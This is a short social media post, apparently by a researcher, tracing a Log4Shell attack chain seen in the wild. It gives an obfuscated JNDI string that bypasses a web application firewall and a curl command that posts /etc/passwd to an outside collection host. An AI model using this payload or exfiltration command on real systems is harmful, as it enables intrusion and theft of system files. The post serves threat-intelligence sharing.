Todays’ flow – #log4j #log4shell
Rogue LDAP -> Base 64 Serialized data -> Char bytes -> etc/passwd
WAF bypass : {${:::::::::::::::::-j}ndi:
Final behavior
curl -i -X POST https://enhvcu12y09lt7y(.m.pipedream.net?host=o=tomcat –data-binary @/etc/passwd
https://t.co/GD9zwi8MPw https://t.co/JJdJmiUelB